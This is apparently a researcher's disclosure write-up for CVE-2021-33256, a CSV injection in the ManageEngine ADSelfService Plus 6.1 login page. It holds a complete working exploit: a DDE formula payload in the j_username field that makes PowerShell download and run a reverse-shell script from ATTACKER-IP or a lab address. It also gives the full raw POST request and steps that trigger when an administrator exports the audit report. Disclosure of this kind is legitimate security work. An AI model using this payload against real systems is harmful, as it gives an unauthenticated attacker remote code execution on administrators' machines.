# ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256) ### # Description There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. `j_username` parameter seems to vulnerable and reverse shell could be obtained if privileged user exports *"User Attempts Audit Report"* as CSV file. {% code title="Payload:" %} ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0 ``` {% endcode %} ### # Proof Of Concept **1-** Malicious user sends POST request to login page `https://TARGET-IP/j_security_check` and sets `j_username` parameter as like the above payload. {% code title="j\_username parameter:" %} ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')' ``` {% endcode %} ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hd0abEiow7_xBNPlA%2F-M_Hd80_mGdnuCpsXmEz%2Fadcsv1.PNG?alt=media\&token=09f05596-9275-4257-9473-3505b547d919) {% code title="POST Request:" %} ``` POST /j_security_check HTTP/1.1 Host: 192.168.1.253:9251 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 192 Origin: https://192.168.1.253:9251 Connection: close Referer: https://192.168.1.253:9251/j_security_check Cookie: * Upgrade-Insecure-Requests: 1 j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28 ``` {% endcode %} And the request attempt will be saved to*"User Attempts Audit Report"* table that is under the *Reports > Audit Reports* section. `Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12` `j_username` parameter value is saved to *"User Name"* column which is start of line in the CSV file: ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')' ``` **2-** Powershell command that sends reverse shell to attacker machine is embeded to last line of the`Invoke-PowershellTcp.ps1` file. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HdIeNWsIIibr0WKmo%2F-M_Hdm82W7S5j24idP85%2Fadcsv7.PNG?alt=media\&token=59394ca6-3f62-44c9-91a7-a63e30373c43) **3-** If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user. ![Exporting User Attempts Audit Report as CSV file](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HdIeNWsIIibr0WKmo%2F-M_Hdfk8dtkLXiSQ1xX1%2Fadcsv2.PNG?alt=media\&token=0566d768-8c91-4f6a-9fd4-c4188da4a0c6) ![Confirmation for Starting Another Application](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_HgnV2C760HOVCySZU%2F-M_HgxXQHVXrioNdm5A8%2Fadcsv3.PNG?alt=media\&token=8d2e91b0-521b-4181-b569-595b3bc68f7b) ![Exported CSV file](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hh5sgBRpc2pG2gD89%2F-M_Hh9213DUVogbg2RiQ%2Fadcsv5.PNG?alt=media\&token=a07f17f1-c171-452b-b884-4a18a731e00e) ![Getting Reverse Shell](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-M_Hh5sgBRpc2pG2gD89%2F-M_HhDy80hcV0m5F5YfM%2Fadcsv6.PNG?alt=media\&token=a7c98c8c-3169-42a2-9210-ff60e74cfb9c) {% embed url="" %} {% embed url="" %} ``` # Author: Metin Yunus Kandemir ``` ### # Reference {% embed url="" %} {% embed url="" %}